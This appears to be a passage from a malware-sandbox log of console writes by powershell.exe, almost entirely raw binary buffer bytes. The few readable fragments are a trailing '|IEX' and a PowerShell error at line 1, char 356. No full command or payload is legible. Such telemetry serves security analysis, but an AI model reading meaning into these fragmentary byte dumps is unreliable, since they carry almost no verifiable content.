          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....%................_.............}..v.....%......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X,......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....-................_.............}..v.....-......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X4......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....5................_.............}..v.....5......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X<......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....=................_.............}..v.....=......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....XD......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....E................_.............}..v.....E......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....XL......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....M................_.............}..v.....M......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....XT......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....U................_.............}..v.....U......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X\......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....]................_.............}..v.....]......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....Xd......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....e................_.............}..v.....e......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....Xl......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....m................_.............}..v.....m......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....Xt......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....u................_.............}..v.....u......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X|......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....}................_.............}..v.....}......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X$......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....%................_.............}..v.....%......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X,......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....-................_.............}..v.....-......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j......P..............._.............}..v....X4......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............4..j.....5................_.............}..v.....5......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j......P..............._.............}..v....X<......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............4..j.....=................_.............}..v.....=......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j......P..............._.............}..v....XD......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............4..j.....E................_.............}..v.....E......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j......P..............._.............}..v....XL......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............4..j.....M................_.............}..v.....M......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j......P..............._.............}..v....XT......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............4..j.....U................_.............}..v.....U......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j......P..............._.............}..v....X\......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............4..j.....]................_.............}..v.....]......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j......P..............._.............}..v....Xd......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............4..j.....e................_.............}..v.....e......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......P..............._.............}..v....Xl......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............4..j.....m................_.............}..v.....m......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....Xt......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....u................_.............}..v.....u......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X|......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....}................_.............}..v.....}......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............6.7.7.8.).|.I.`.E.`.X............._.............}..v....(.......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....`.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....(.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....`.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .x.c.e.p.t.i.o.n............._.............}..v............0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....0.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......P..............._.............}..v.... .......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....X.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v............0.......................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....P.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.5.6.............}..v....`.......0.................P.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....` ......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....!................_.............}..v.....!......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`(......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....)................_.............}..v.....)......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`0......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....1................_.............}..v.....1......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`8......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....9................_.............}..v.....9......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`@......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....A................_.............}..v.....A......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`H......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....I................_.............}..v.....I......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`P......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....Q................_.............}..v.....Q......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`X......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....Y................_.............}..v.....Y......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....``......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....a................_.............}..v.....a......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j......P..............._.............}..v....`h......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............4..j.....i................_.............}..v.....i......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j......P..............._.............}..v....`p......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............4..j.....q................_.............}..v.....q......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j......P..............._.............}..v....`x......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............4..j.....y................_.............}..v.....y......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j......P..............._.............}..v....` ......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;...............4..j.....!................_.............}..v.....!......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j......P..............._.............}..v....`(......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............4..j.....)................_.............}..v.....)......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j......P..............._.............}..v....`0......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............4..j.....1................_.............}..v.....1......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j......P..............._.............}..v....`8......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............4..j.....9................_.............}..v.....9......0...............H.P.............................
